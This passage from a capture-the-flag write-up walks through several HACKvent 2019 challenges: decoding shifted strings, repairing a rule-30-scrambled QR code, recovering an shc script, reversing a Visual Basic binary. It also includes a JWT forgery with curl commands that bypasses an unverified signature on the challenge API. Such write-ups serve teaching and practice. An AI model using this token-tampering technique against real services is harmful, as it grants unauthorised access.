data.\n<br\/>\n<br\/>For the first byte of the creditcards data there are three different values: <code>Q (0x51)<\/code>, <code>R (0x52)<\/code> and <code>S (0x53)<\/code>. Assuming that these must be mapped to a digit from <code>0 (0x30)<\/code> to <code>9 (0x39)<\/code> the offset must be between <code>0x53 - 0x39 = 26<\/code> and <code>0x51 - 0x30 = 33<\/code>.\n<br\/>\n<br\/>As already stated because of the observed shift, we increase the offset for each byte by one. After trying out the different offsets beginning from <code>26<\/code>, we obviously get a hit at <code>30<\/code> using the following python script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\ncc1  = 'QVXSZUVY\\\\ZYYZ[a'\ncc2  = 'QOUW[VT^VY]bZ_'\ncc3  = 'SPPVSSYVV\\\\YY_\\\\\\\\]'\ncc4  = 'RPQRSTUVWXYZ[\\\\]^'\ncc5  = 'QTVWRSVUXW[_Z`\\\\b'\nflag = 'SlQRUPXWVo\\\\Vuv_n_\\\\ajjce'\n\nenc = [cc1,cc2,cc3,cc4,cc5,flag]\nfor x in range(26,34):\n  print('offset = ' + str(x))\n  for e in enc:\n    dec = ''\n    for i in range(len(e)):\n      c = e[i]\n      dec += chr(ord(c)-(x+i))\n    print(dec)\n  print('')<\/pre>\n<br\/>Running the script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/08# .\/crack.py\noffset = 26\n7;&lt;6&lt;668:754449\n749:=74=469=48\n9549549549549544\n8555555555555555\n79::4464647:4949\n9Q5571864L81OO7E515=&lt;45\n\noffset = 27\n6:;5;5579643338\n6389&lt;63&lt;358&lt;37\n8438438438438433\n7444444444444444\n6899335353693838\n8P4460753K70NN6D404&lt;;34\n\noffset = 28\n59:4:4468532227\n5278;52;247;26\n7327327327327322\n6333333333333333\n5788224242582727\n7O335\/642J6\/MM5C3\/3;:23\n\noffset = 29\n489393357421116\n4167:41:136:15\n6216216216216211\n5222222222222222\n4677113131471616\n6N224.531I5.LL4B2.2:912\n\noffset = 30\n378282246310005\n30569309025904\n5105105105105100\n4111111111111111\n3566002020360505\n5M113-420H4-KK3A1-19801\n\noffset = 31\n26717113520\/\/\/4\n2\/4582\/8\/148\/3\n40\/40\/40\/40\/40\/\/\n3000000000000000\n2455\/\/1\/1\/25\/4\/4\n4L002,31\/G3,JJ2@0,087\/0\n\noffset = 32\n1560600241\/...3\n1.3471.7.037.2\n3\/.3\/.3\/.3\/.3\/..\n2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n1344..0.0.14.3.3\n3K\/\/1+20.F2+II1?\/+\/76.\/\n\noffset = 33\n045\/5\/\/130.---2\n0-2360-6-\/26-1\n2.-2.-2.-2.-2.--\n1...............\n0233--\/-\/-03-2-2\n2J..0*1\/-E1*HH0&gt;.*.65-.<\/pre>As we can see clearly, only the offset <code>30<\/code> results in 5 valid creditcard numbers as well as the flag.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{5M113-420H4-KK3A1-19801}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.09\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.09 &#8211; Santas&nbsp;Quick&nbsp;Response&nbsp;3.0<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_09.png\" \/><\/td><td style=\"color:#333333\">Author: brp64 feat. M.<\/td><\/tr><tr><td colspan=\"2\">Visiting the following railway station has left lasting memories.\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_01_wall.jpg\" \/>\n<br\/>\n<br\/>Santas brand new gifts distribution system is heavily inspired by it. Here is your personal gift, can you extract the destination path of it?\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_02_qrcode.png\" \/>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The first insight can be gained by using google&#8217;s image search on the first image, which leads to the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Rule_30\" rel=\"noopener noreferrer\" target=\"_blank\">wikipedia article of rule 30<\/a>.\n<br\/>\n<br\/>The second major observation is related to the second image, the obviously invalid QR code. Although the major part of the QR code seems to be messed up, the squares in the upper left and upper right corner seem to be untouched. Combining this with the layout of the evolution diagram of rule 30 &#8230;\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_03_rule30.png\" width=\"400px\"\/>\n<br\/>\n<br\/>&#8230; raises the question if the QR code might be transformed using the rule 30 pyramid.\n<br\/>\n<br\/>Initially I wrote a python script, which reads the invalid QR code into a two dimensional array (for further processing) and prints it as ASCII:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/09# cat qrcode.py\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\nimport sys\n\ndef printQR(qr):\n  for i in range(len(qr)):\n    for j in range(len(qr[i])):\n      if (qr[i][j] == 1): sys.stdout.write('X')\n      else: sys.stdout.write(' ')\n    print('')\n\ndef readImage(filename):\n  data = []\n  im = Image.open(filename)\n  pix = im.load()\n  for h in range(2, im.size[0], 5):\n    data.append([])\n    for w in range(2, im.size[1], 5):\n      p = pix[w,h]\n      if (p == 0 or p == (0,255)): data[len(data)-1].append(1)\n      else: data[len(data)-1].append(0)\n  return data\n\nqrcode = readImage('bd659aba-5ad2-4ad3-992c-6f99023792bc.png')\nprintQR(qrcode)<\/pre>\n<br\/>Running the script outputs the QR code as ASCII:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/09# .\/qrcode.py \nXXXXXXX   X  X XX   XXX   XXXXXXX\nX     X XX  XX XXXXX  X X X     X\nX XXX X XX X XXX XXXXX  X X XXX X\nX XXX X XX   X X X XXXX   X XXX X\nX XXX X XXXX X     XX  X  X XXX X\nX     X XXXX  XXXX  XX X  X     X\nXXXXXXX X XX  XXX X   XXX XXXXXXX\n         XXXXX XX X  XX          \n  X  XXXX   X X   X     X  XXXXX \n  XXXX XX X XXX X X   XX       XX\nX X X XX   X X X X XX X XXXXXXX X\n X    XX  X X     X X XXX  XXX   \n    XX  X   X  X    XX  XXX XX XX\n XXX    XX X X X X     XX X XXX  \n   XX X   X  XX     XXX XXX   XXX\n XX   X X  X    X X XXXX XXXXXX X\n  X   X    X  XX  X      X X  XX \nXXXX  X XX  X X  X X   X XX   X X\nX X  XXXXXX XX  XX X  X  XX  XXXX\nX  X   XX  X X     XXX X XXX  XXX\n X XX   X XXXXX XXX  X  XXXXXXX  \nXXX X   X XX  XX  XXXX  X  XXXXX \nXXX X    XX XXXX X XXX  X  X X X \nX X  XXXX  XXXXX X X X X X XXXXXX\nX  XXX  XX X  XX  X  XXX X    X X\nXX  XXX X XX X X   X   X  X X  X \n X   XXXXX    XXX XX X XX  XXX   \n  X  X XXXX XXX X    X   XX  XX  \nX    XX   X   XXX X   X XXXX XXXX\n X XX   XX XX XX  X XX   X   X  X\n  X XX     XX  X X    X  XX XXXXX\nXXXX XX XXX   X  XXX  XXXXX    X \n  XXX  XXX    XX    XX XX  X XX X<\/pre>\n<br\/>If we assume that the QR code was XORed with the rule 30 pyramid, we can take the 7th line as a reference, because it contains the timing pattern (<code>X-X-X-X...<\/code>). XORing the current 7th line with the line as it should actually be within a valid QR code should result in a line of the rule 30 pyramid, if your assumption is correct:\n<br\/>\n<br\/><pre>\n<br\/>XXXXXXX X XX  XXX X   XXX XXXXXXX  <-- 7th line invalid QR code\n<br\/>XXXXXXX X X X X X X X X X XXXXXXX  <-- 7th line in a valid QR code\n<br\/>---------------------------------\n<br\/>           XX  X    X  X           <-- XOR result (line of rule 30?)\n<br\/><\/pre>\n<br\/>We can actually confirm that the result is a line of the rule 30 pyramid. Even more confirmative is the fact that is also the 7th line of the pyramid:\n<br\/>\n<br\/><pre>\n<br\/>                 X               \n<br\/>                XXX              \n<br\/>               XX  X             \n<br\/>              XX XXXX            \n<br\/>             XX  X   X           \n<br\/>            XX XXXX XXX          \n<br\/>           XX  X    X  X         <-- 7th line\n<br\/>          XX XXXX  XXXXXX        \n<br\/>         XX  X   XXX     X       \n<br\/>        XX XXXX XX  X   XXX      \n<br\/>       XX  X    X XXXX XX  X     \n<br\/>      XX XXXX  XX X    X XXXX    \n<br\/>     XX  X   XXX  XX  XX X   X   \n<br\/><\/pre>\n<br\/>In order to XOR the invalid QR code with the rule 30 pyramid, we can scale and position the image of the rule 30 pyramid from above (it is not supposed to be centered) and save it as an image with the same size as the QR code image. This way, the python script can be reused to read the image data into a two dimensional array:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_04_rule30_scaled.png\" \/>\n<br\/>\n<br\/>Finally we should add a function, which XORs both arrays and saves an array back to an image file. The full script looks like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom PIL import Image\nimport sys\n\n\ndef printQR(qr):\n  for i in range(len(qr)):\n    for j in range(len(qr[i])):\n      if (qr[i][j] == 1): sys.stdout.write('X')\n      else: sys.stdout.write(' ')\n    print('')\n\n\ndef readImage(filename):\n  data = []\n  im = Image.open(filename)\n  pix = im.load()\n  for h in range(2, im.size[0], 5):\n    data.append([])\n    for w in range(2, im.size[1], 5):\n      p = pix[w,h]\n      if (p == 0 or p == (0,255)): data[len(data)-1].append(1)\n      else: data[len(data)-1].append(0)\n  return data\n\n\ndef saveQR(qr, filename):\n  im = Image.new('RGB', (39,39))\n  arr = []\n  arr += [(255,255,255)]*39*3\n  for i in range(len(qr)):\n    arr += [(255,255,255)]*3\n    for j in range(len(qr[i])):\n      if (qr[i][j] == 1): arr += [(0,0,0)]\n      else: arr += [(255,255,255)]\n    arr += [(255,255,255)]*3\n  arr += [(255,255,255)]*39*3\n  im.putdata(arr)\n  im.save(filename)\n\ndef xorImages(img1, img2):\n  data = []\n  for i in range(len(img1)):\n    data.append([])\n    for j in range(len(img1[i])):\n      data[i].append(img1[i][j] ^ img2[i][j])\n  return data\n\n\nqrcode = readImage('bd659aba-5ad2-4ad3-992c-6f99023792bc.png')\nrule30 = readImage('rule30.png')\nfinal = xorImages(qrcode, rule30)\nprintQR(final)\nsaveQR(final, 'out.png')<\/pre>\n<br\/>After running the script, the resulting QR code is stored in <code>out.png<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/09_05_final.png\" \/>\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/09# zbarimg out.png \nQR-Code:HV19{Cha0tic_yet-0rdered}\nscanned 1 barcode symbols from 1 images in 0.02 seconds<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Cha0tic_yet-0rdered}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.10\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.10 &#8211; Guess&nbsp;what<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_10.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">The flag is right, of course\n<br\/>\n<br\/><span class=\"link\">HV19.10-guess3.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>After two broken binaries were uploaded, the final binary (contained in <code>HV19.10-guess3.zip<\/code>) worked well.\n<br\/>\n<br\/>The binary is a dynamically linked, stripped 64-bit ELF file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/10# unzip d658ab66-6859-416d-8554-9a4ee0105794.zip \nArchive:  d658ab66-6859-416d-8554-9a4ee0105794.zip\n  inflating: guess3                  \nroot@kali:~\/hv19\/10# file guess3 \nguess3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=5e1e9f74990e4f8f96d380d2b5264a3567a9d046, stripped<\/pre>\n<br\/>During my initial research before the final binary was uploaded, I stumbled upon <a href=\"https:\/\/github.com\/neurobin\/shc\" rel=\"noopener noreferrer\" target=\"_blank\">shc<\/a>, which was obviously used to create the binaries. shc basically converts a shell script to an ELF binary.\n<br\/>\n<br\/>When we run the binary, we are prompted for an input:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/10# .\/guess3\nYour input: <\/pre>\n<br\/>If we now simply inspect the output of <code>ps<\/code>, we can see the original shell script, which contains the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~# ps aux | grep guess3\nroot      5881  0.0  0.0   6584  2848 pts\/1    S+   08:28   0:00 .\/guess3 -c                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 #!\/bin\/bash  read -p \"Your input: \" input  if [ $input = \"HV19{Sh3ll_0bfuscat10n_1s_fut1l3}\" ]  then   echo \"success\" else    echo \"nooooh. try harder!\" fi   .\/guess3\nroot      6046  0.0  0.0   6136   888 pts\/2    S+   08:29   0:00 grep guess3<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Sh3ll_0bfuscat10n_1s_fut1l3}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.11\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.11 &#8211; Frolicsome&nbsp;Santa&nbsp;Jokes&nbsp;API<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_11.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">The elves created an API where you get random jokes about santa.\n<br\/>\n<br\/>Go and try it here: <span class=\"link\">http:\/\/whale.hacking-lab.com:10101<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to the <code>FSJA API<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/11_01_api.png\" width=\"900px\"\/>\n<br\/>\n<br\/>According to the description, let&#8217;s start by creating a user:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/11# curl -s -X POST -H 'Content-Type: application\/json' http:\/\/whale.hacking-lab.com:10101\/fsja\/register --data '{\"username\":\"scryh\", \"password\": \"giveflagplx\"}'\n{\"message\":\"User created\",\"code\":201}\n<\/pre>\n<br\/>Now we can retrieve our token:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/11# curl -s -X POST -H 'Content-Type: application\/json' http:\/\/whale.hacking-lab.com:10101\/fsja\/login --data '{\"username\":\"scryh\", \"password\": \"epixplzplz\"}'\n{\"message\":\"Token generated\",\"code\":201,\"token\":\"eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoic2NyeWgiLCJwbGF0aW51bSI6ZmFsc2V9LCJleHA\niOjE1NzYwNTQ1NTUuOTU3MDAwMDAwfQ.CPgXKYMPSEKIib8du1Mfr9jd_Eqo5qNxLEn3qEgAsFM\"}<\/pre>\n<br\/>Using this token, we can get a random santa joke:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/11# curl -X GET \"http:\/\/whale.hacking-lab.com:10101\/fsja\/random?token=eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuY...\"\n{\"joke\":\"This past Christmas, I told my girlfriend for months in advance that all I wanted was an Xbox. That\u2019s it. Beginning and end of list, Xbox. You know what she got me? A homemade frame with a picture of us from our first date together. Which was fine. Because I got her an Xbox.\",\"author\":\"Anthony Jeselnik\",\"platinum\":false}\n<\/pre>\n<br\/>Let&#8217;s have a look at the token, which is a <code>JSON Web Token<\/code> and can be parsed nicely on <a href=\"https:\/\/jwt.io\/\" rel=\"noopener noreferrer\" target=\"_blank\">jwt.io<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/11_02_jwt.png\" width=\"800px\"\/>\n<br\/>\n<br\/>As we have already seen in the joke output, there is an attribute called <code>platinum<\/code>, which is currently set to <code>false<\/code>.\n<br\/>\n<br\/>At first I started <a href=\"https:\/\/github.com\/lmammino\/jwt-cracker\" rel=\"noopener noreferrer\" target=\"_blank\">jwt-cracker<\/a> in the background, which could potentially crack the secret used to sign the token.\n<br\/>\n<br\/>Though it turned out to be even more easy. It simply suffice to set the attribute from <code>false<\/code> to <code>true<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/11_03_jwt2.png\" width=\"600px\"\/>\n<br\/>\n<br\/>If we know request a joke using the new token, we get the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~# curl -X GET \"http:\/\/whale.hacking-lab.com:10101\/fsja\/random?token=eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoic2NyeWgiLCJwbGF0aW51bSI6dHJ1ZX0sImV4cCI6MTU3NjA1NDU1NS45NTd9.24NlMDst57dLNgA0iOAiDOPOMwIoqHGAqp23i-F2vME\"\n{\"joke\":\"Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}\",\"author\":\"Santa\",\"platinum\":true}\n<\/pre>\n<br\/>The signature is not verified at all. This means that we can even totally omit the signature.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.12\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.12 &#8211; back&nbsp;to&nbsp;basic<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_12.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa used his time machine to get a present from the past. get your rusty tools out of your cellar and solve this one!\n<br\/>\n<br\/><span class=\"link\">HV19.12-BackToBasic.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a 32-bit PE binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/12# unzip 67e6c6c2-1119-4c1e-a9b5-85f118173a40.zip \nArchive:  67e6c6c2-1119-4c1e-a9b5-85f118173a40.zip\n  inflating: BackToBasic.exe         \nroot@kali:~\/hv19\/12# file BackToBasic.exe \nBackToBasic.exe: PE32 executable (GUI) Intel 80386, for MS Windows<\/pre>\n<br\/>Running <code>strings<\/code> on the file outputs several <code>__vba<\/code> function names, which suggests that the binary was built with <code>Visual Basic<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/12# strings BackToBasic.exe \n!This program cannot be run in DOS mode.\nRich\n.text\n`.data\n.rsrc\nMSVBVM60.DLL\njRs1hRs\n...\nHACKvent2019\nProject1\nForm1\nProject1\nForm\nC:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB\nText1\nLabel1\nVBA6.DLL\n__vbaFreeVar\n__vbaVarForNext\n__vbaStrVarVal\n__vbaVarXor\n__vbaI4Var\n__vbaVarAdd\n__vbaVarSub\n__vbaVarForInit\n__vbaLenVar\n...\n<\/pre>\n<br\/>So let&#8217;s boot up a windows machine.\n<br\/>\n<br\/>A good start for reversing a Visual Basic binary is <a href=\"https:\/\/www.vb-decompiler.org\/download.htm\" rel=\"noopener noreferrer\" target=\"_blank\">VB Decompiler Lite<\/a>. It quickly displays the form and code components:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_01_vbdecomp.png\" width=\"700px\"\/>\n<br\/>\n<br\/>The form only contains a single text field:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_02_form.png\" width=\"700px\"\/>\n<br\/>\n<br\/>We can also have a look at the disassembly of the code. There is also a decompiler, which is only available in the pro version though:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_03_code.png\" width=\"700px\"\/>\n<br\/>\n<br\/>By having a quick look at the disassembly we can identify a few interesting static strings:\n<br\/><pre>00401B40h ; \"6klzic<=bPBtdvff'y\\x7fFI~on\/\/N\"\n<br\/>00401B7Ch ; \"Status: correct\"\n<br\/>00401BB0h ; \"Status: wrong\"<\/pre>\n<br\/>The first one is probably the encrypted flag. The second and third one could probably be used to track down the path to the valid flag.\n<br\/>\n<br\/>Despite of using <code>VB Decompiler<\/code> to get a quick overview I prefer to use a debugger in order to analyze the binary dynamically.\n<br\/>\n<br\/>So let&#8217;s run the binary in <a href=\"https:\/\/x64dbg.com\/#start\" rel=\"noopener noreferrer\" target=\"_blank\">x64dbg<\/a> (or more precisely x32dbg):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_04_x32dbg.png\" width=\"900px\"\/>\n<br\/>\n<br\/>By pressing <code>F9<\/code> once (<code>Run<\/code>) we continue to the entry point of <code>BackToBasic.exe<\/code>. Here we can set a breakpoint at the beginning of the <code>Text1_Change<\/code> function located at <code>00401F80<\/code> (the address is displayed by VB Decompiler):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_05_br1.png\" width=\"900px\"\/>\n<br\/>\n<br\/>The breakpoint is triggered each time we edit the input of the text field. After the breakpoint is hit we can single step through the code in order to comprehend what the flag is supposed to be. At the beginning there are a few calls to <code>__vbaVarCmpEq<\/code> and static references to the characters <code>H, V, 1<\/code> and <code>9<\/code>. This part probably determines if the flag begins with <code>HV19<\/code>. Following those instructions there is a <code>je 004024B2<\/code> at <code>00402280<\/code>. Following the jump destination (<code>004024B2<\/code>) we can see, that this branch outputs the string <code>\"Status: wrong\"<\/code>. This means that the jump is not taken, if we enter a string with the correct flag prefix.\n<br\/>\n<br\/>We can verify our assumption that the first part checks if the flag begins with <code>HV19<\/code> by setting a breakpoint on the <code>je<\/code> instruction at <code>00402280<\/code> and enter different values in the text field. If we enter something, which does not begin with <code>HV19<\/code>, the jump is taken and the program displays the message <code>\"Status: wrong\"<\/code>. As soon as we enter <code>HV19<\/code>, the jump is not taken:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_06_jmp1.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Within the next instructions the function <code>__vbaLenVar<\/code> is called, followed by another <code>je<\/code> instruction at <code>004022B9<\/code>. The obvious guess here is that this part determines if the length of the input equals the flag&#8217;s length. A few lines ahead we can also see, that <code>0x21<\/code> (= <code>33<\/code>) is stored on the stack. Thus we can assume that the input length should be 33. We can again verify this by setting a breakpoint on the <code>je<\/code> instruction and testing different inputs. As soon as we enter a string of 33 characters, which begins with <code>HV19<\/code> the jump is not taken anymore:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_07_jmp2.png\" width=\"900px\"\/>\n<br\/>\n<br\/>In the instructions that follow there is a loop, which seems to iterate over our input. The call to <code>__vbaVarXor<\/code> should raise our attention, since it is probably used the XOR our input and compare it with the static string we also saw in VB Decompiler. Unfortunately it is not too easy to inspect the values on a <code>__vba<\/code> function call, since these function take Visual Basic variables as parameters. Without knowing the structure of these objects, we don&#8217;t know where to find the actual value of a variable.\n<br\/>\n<br\/>After the loop there is a call to <code>__vbaVarTstEq<\/code> followed by another <code>je<\/code> instruction at <code>00402433<\/code>. This is probably the comparison of our XORed input with the static string <code>\"6klzic<=bPBtdvff'y\\x7fFI~on\/\/N\"<\/code> stored at <code>00401B40<\/code>. Let's set a breakpoint on the call and inspect the parameters:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_08_ecx.png\" width=\"900px\"\/>\n<br\/>\n<br\/>There are two parameters, which are pushed on the stack before the call (stored <code>eax<\/code> and <code>ecx<\/code>). Again these are actually Visual Basic variables, but if we inspect the value stored in <code>ecx<\/code>, we can see that at offset 8 there is the address of the static string (<code>00401B40<\/code>). If we now inspect the value of <code>eax<\/code> at the same offset, we should see a reference to the string containing our XORed input:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_09_eax.png\" width=\"900px\"\/>\n<br\/>\n<br\/>At offset 8 the address <code>0044987C<\/code> is stored. Let's have a look at this address:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_10_xor.png\" width=\"600px\"\/>\n<br\/>\n<br\/>This can definitely be our XORed input string. By changing the first character of our input, we can verify that the first character of the supposed XORed input changes.\n<br\/>\n<br\/>At last we only need to change our input so that the XORed input matches the string <code>\"6klzic<=bPBtdvff'y\\x7fFI~on\/\/N\"<\/code>. Changing the first three characters manually reveals the beginning of the flag: <code>0ld<\/code>. Let's see if we can find a pattern in the XOR key:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&gt;&gt;&gt; ord('0')^ord('6')\n6\n&gt;&gt;&gt; ord('l')^ord('k')\n7\n&gt;&gt;&gt; ord('d')^ord('l')\n8\n<\/pre>\n<br\/>Obviously the XOR key is <code>6<\/code> for the first character (which is actually the 6th character of the flag taking the <code>HV19{<\/code> into account) and increases by one for each character. Accordingly the following python script should generate the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nencr = '6klzic&lt;=bPBtdvff\\'y\\x7fFI~on\/\/N'\nflag = ''\nfor i in range(len(encr)):\n  c = encr[i]\n  flag += chr(ord(c)^(i+6))\n\nprint(flag)<\/pre>\n<br\/>Running the script outputs the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/12# .\/flag.py \n0ldsch00l_Revers1ng_Sess10n<\/pre>\n<br\/>The binary verifies that we have found the correct flag:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_11_flag.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{0ldsch00l_Revers1ng_Sess10n}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.13\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.13 - TrieMe<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_13.png\" \/><\/td><td style=\"color:#333333\">Author: kiwi<\/td><\/tr><tr><td colspan=\"2\">Switzerland's national security is at risk. As you try to infiltrate a secret spy facility to save the nation you stumble upon an interesting looking login portal.\n<br\/>\n<br\/>Can you break it and retrieve the critical information?\n<br\/>\n<br\/>Facility: <span class=\"link\">http:\/\/whale.hacking-lab.com:8888\/trieme\/<\/span>\n<br\/><span class=\"link\">HV19.13-NotesBean.java.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to a website showing a single text field and a login button:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_01_page.png\" 